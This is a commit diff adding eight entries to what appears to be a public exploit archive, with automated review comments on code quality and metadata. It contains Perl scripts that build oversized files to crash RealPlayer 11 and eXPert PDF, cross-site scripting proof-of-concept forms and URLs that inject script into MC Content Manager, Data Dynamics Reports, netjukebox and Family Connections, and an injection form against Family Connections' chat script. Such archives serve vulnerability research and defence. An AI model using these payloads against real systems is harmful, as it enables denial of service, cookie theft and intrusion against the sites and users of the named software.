Updated 12_10_2014
parent
6a7030ba10
commit
92c2a90af7
9 changed files with 257 additions and 0 deletions
|
@ -31965,3 +31965,11 @@ id,file,description,date,author,platform,type,port
|
|||
35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
|
||||
35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0
|
||||
35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
|
||||
35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0
|
||||
35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0
|
||||
35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0
|
||||
35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
|
||||
35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 'skin' Parameter Cross Site Scripting Vulnerability",2011-03-24,"AutoSec Tools",php,webapps,0
|
||||
35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 'subject' Parameter HTML Injection Vulnerability",2011-03-25,"Zero Science Lab",php,webapps,0
|
||||
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
|
||||
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
|
||||
|
|
|
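--- a/platforms/multiple/remote/35495.txt
+++ b/platforms/multiple/remote/35495.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47008/info
+
+Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue.
+
+An attacker can exploit these issues to execute arbitrary code and gain access to sensitive information. Other attacks may also be possible.
+
+Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/35495.zip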
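Review bot: The last line of the new file links to `http://www.exploit-db.com/sploits/35495.zip` over plain HTTP and records no digest, so anyone fetching the archive for analysis cannot confirm it is the file this entry was written against. Add a checksum line next to the link, for example `sha256: <SHA256_OF_35495.zip>` (placeholder value), and use an `https://` link if the host serves one. The text also names an information-disclosure and a code-execution issue without saying which WebAccess component is affected, which limits its use for scoping exposure or writing detections.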
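--- a/platforms/multiple/remote/35501.pl
+++ b/platforms/multiple/remote/35501.pl
@@ -0,0 +1,59 @@
+source: http://www.securityfocus.com/bid/47039/info
+
+RealPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+RealPlayer 11.0 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+
+###
+# Title : RealPlayer v11.0 (.rmp) Buffer Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows
+# Impact : Buffer Overflow
+# Tested on : Windows XP SP3 Fran.ais
+# Target : RealPlayer v11.0
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# -----------------
+# XML version : 1.0 in (Real Metadata Package File)
+# <?xml version="1.0"?>
+# <embed src="rtsp:// **BUFFER ** " autoplay="whatever" />Null
+# -----------------
+#START SYSTEM /root@MSdos/ :
+# -----------------
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";
+print " |============================================================|\n";
+print " |= [!] Name : RealPlayer v11.0 Real Metadata Package File =|\n";
+print " |= [!] Exploit : Buffer Overflow =|\n";
+print " |= [!] Author : KedAns-Dz =|\n";
+print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
+print " |============================================================|\n";
+sleep(2);
+print "\n";
+# Parameter OverFlow =>
+my $kA = "\x41" x 333 ; # A * 333
+my $kB = "\x42" x 333 ; # B * 333
+my $kC = "\x43" x 333 ; # C * 333
+my $buffer = $kA.$kB.$kC ;
+my $header =
+"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31".
+"\x2e\x30\x22\x3f\x3e\x0d\x0d\x3c\x65\x6d\x62\x65\x64\x20\x73\x72".
+"\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f\x2f".$buffer."\x22\x20\x61\x75\x74\x6f".
+"\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76\x65\x72\x22\x20".
+"\x2f\x3e\x00";
+# Creating ...
+my $kedans = $header ; # |=:: Header & AAA...BBB...CC etc ::=|
+open (FILE ,"> Crash.rmp"); # Evil File Here
+print FILE $kedans ;
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close (FILE);
+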
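Review bot: The success message is printed whether or not `Crash.rmp` was written, because `open (FILE ,"> Crash.rmp")` is unchecked and the `or die` hangs off the `print` of the success line, so it can only fire if writing to STDOUT fails. Check the open itself with a lexical handle and the three-argument form, `open(my $fh, '>', 'Crash.rmp') or die "open Crash.rmp: $!";`, and check `close` as well, since buffered write errors surface there. The same pattern appears in `platforms/windows/dos/35502.pl` (`open(file , ">", "Kedans.html")` followed by the identical `print ... or die print`). Neither script enables `use strict; use warnings;`.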
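--- a/platforms/php/webapps/35496.txt
+++ b/platforms/php/webapps/35496.txt
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/47014/info
+
+MC Content Manager is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MC Content Manager 10.1.1 is vulnerable; other versions may also be affected.
+
+<form name="hack" action="http://www.example.com/?module=users" method="post">
+<input type="hidden" name="module" value="users">
+<input type="hidden" name="action" value="remind">
+<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
+</form>
+
+<form name="hack" action="http://www.example.com/?module=users" method="post">
+<input type="hidden" name="module" value="users">
+<input type="hidden" name="action" value="register">
+<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
+</form>
+
+<form name="hack" action="http://www.example.com/?module=users" method="post">
+<input type="hidden" name="module" value="users">
+<input type="hidden" name="action" value="register">
+<input type="hidden" name="user_hide" value='"><script>alert(document.cookie)</script>'>
+</form>
+
+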
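--- a/platforms/php/webapps/35497.txt
+++ b/platforms/php/webapps/35497.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/47015/info
+
+GrapeCity Data Dynamics Reports is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Data Dynamics Reports 1.6.2084.14 is vulnerable; other versions may also be affected.
+
+http://www.example.com/CoreHandler.ashx?dd:script=CoreViewerInit.js&reportName=<script>alert('XSS1!')</script>&uniqueId=<script>alert('XSS2!')</script>#
+http://www.example.com/CoreHandler.ashx?dd:script=CoreController.js&uniqueId=<script>alert('XSS1!')</script>&traceLevel=<script>alert('XSS2!')</script>#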
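Review bot: The platform tag on this entry looks wrong: it is filed under `platforms/php/webapps/` and indexed as `php`, but both sample URLs target `CoreHandler.ashx`, which is an ASP.NET handler. Anyone filtering the index by platform to scope exposure would get a false hit under PHP and miss the entry under ASP.NET. Suggest correcting the platform in the index row and the file path, or, if the layout is fixed by the upstream import, stating the real platform in the description.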
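--- a/platforms/php/webapps/35498.txt
+++ b/platforms/php/webapps/35498.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47017/info
+
+Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.
+
+Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.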
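Review bot: Lines 9 to 13 of the new file repeat lines 3 to 7 word for word, and the file never names an affected page or parameter, although the index title promises one cross-site scripting issue and multiple SQL-injection issues. As committed, the entry gives a defender nothing to match against request logs or to verify a fix with beyond the product name and version. Drop the duplicated paragraphs and either list the affected pages and parameters as given in the referenced advisory (`http://www.securityfocus.com/bid/47017/info`) or mark the entry as description-only.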
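--- a/platforms/php/webapps/35499.txt
+++ b/platforms/php/webapps/35499.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47027/info
+
+netjukebox is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+netjukebox 5.25 is vulnerable; other versions may also be affected.
+
+http://www.example.com/netjukebox/message.php?skin=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E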
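--- a/platforms/php/webapps/35500.txt
+++ b/platforms/php/webapps/35500.txt
@@ -0,0 +1,68 @@
+source: http://www.securityfocus.com/bid/47037/info
+
+Family Connections is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+Family Connections 2.3.2 is vulnerable; other versions may also be affected.
+
+<!--
+
+
+Family Connections CMS 2.3.2 (POST) Stored XSS And XPath Injection
+
+
+Vendor: Ryan Haudenschilt
+Product web page: http://www.familycms.com
+Affected version: 2.3.2
+
+Summary: Family Connections is an open source
+content management system. It makes creating a
+private, family website easy and fun.
+
+Desc: FCMS suffers from a stored XSS vulnerability
+(post-auth) in messageboard.php script thru the
+'subject' post parameter. XPath lies in the
+/inc/getChat.php script with 'users' get parameter with
+no args, and post parameter 'message'.
+
+Tested on: Microsoft Windows XP Professional SP3 (EN)
+Apache 2.2.14 (Win32)
+PHP 5.3.1
+MySQL 5.1.41
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+liquidworm gmail com
+Zero Science Lab - http://www.zeroscience.mk
+
+
+Advisory ID: ZSL-2011-5004
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php
+
+
+22.03.2011
+
+
+-->
+
+
+
+<html>
+<title>Family Connections CMS 2.3.2 Stored XSS And XPath Injection</title>
+<body bgcolor="#1C1C1C">
+<script type="text/javascript">
+function xpath(){document.forms["xpath"].submit();}
+function xss(){document.forms["xss"].submit();}
+</script>
+<form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xpath">
+<input type="hidden" name="message" value="\\';--\\";--" /></form>
+<a href="javascript: xpath();" style="text-decoration:none">
+<b><font color="red"><center><h3><br /><br />Exploit XPath!<h3></center></font></b></a>
+<form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
+<input type="hidden" name="subject" value='"><script>alert(1)</script>' />
+<input type="hidden" name="post" value="waddup" />
+<input type="hidden" name="name" value="1" />
+<input type="hidden" name="post_submit" value="Submit" /></form>
+<a href="javascript: xss();" style="text-decoration:none">
+<b><font color="red"><center><h3><br /><br />Exploit XSS!<h3></center></font></b></a>
+</body></html>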
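Review bot: The index row and the BID summary at the top of this file describe a single issue, HTML injection through `subject`, while the embedded advisory and the first form cover a second issue against `/inc/getChat.php` that it labels XPath injection. The `message` value is built from quote characters and `--`, which reads more like SQL comment syntax than an XPath expression, so the label should be confirmed against advisory ZSL-2011-5004 before it is relied on for triage. Suggest extending the index description to mention the `getChat.php` issue so that a search for that script finds this entry. Both headings are also closed with `<h3>` instead of `</h3>`.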
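--- a/platforms/windows/dos/35502.pl
+++ b/platforms/windows/dos/35502.pl
@@ -0,0 +1,54 @@
+source: http://www.securityfocus.com/bid/47040/info
+
+eXPert PDF is prone to a denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
+
+eXPert PDF 7.0.880.0 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+
+###
+# Title : eXPert PDF Batch Creator v7 Denial of Service Exploit
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows
+# Impact : Blocked 'vsbatch2pdf.exe' When Generate
+# Tested on : Windows XP SP3 Fran?ais
+# Target : eXPert PDF Editor v7.0.880.0
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# Usage : Upload The HTML file in eXPert PDF Batch Creator (vsbatch2pdf.exe) And Start The Generate
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";
+print " |=============================================|\n";
+print " |= [!] Name : eXPert PDF Batch Creator v7 =|\n";
+print " |= [!] Exploit : Denial of Service Exploit =|\n";
+print " |= [!] Author : KedAns-Dz =|\n";
+print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
+print " |=============================================|\n";
+sleep(2);
+print "\n";
+my $junk = "http://"."\x41" x 17425;
+open(file , ">", "Kedans.html");
+print file $junk;
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close(file);
+
+#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
+# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
+# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
+# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
+# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
+# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
+#================================================================================================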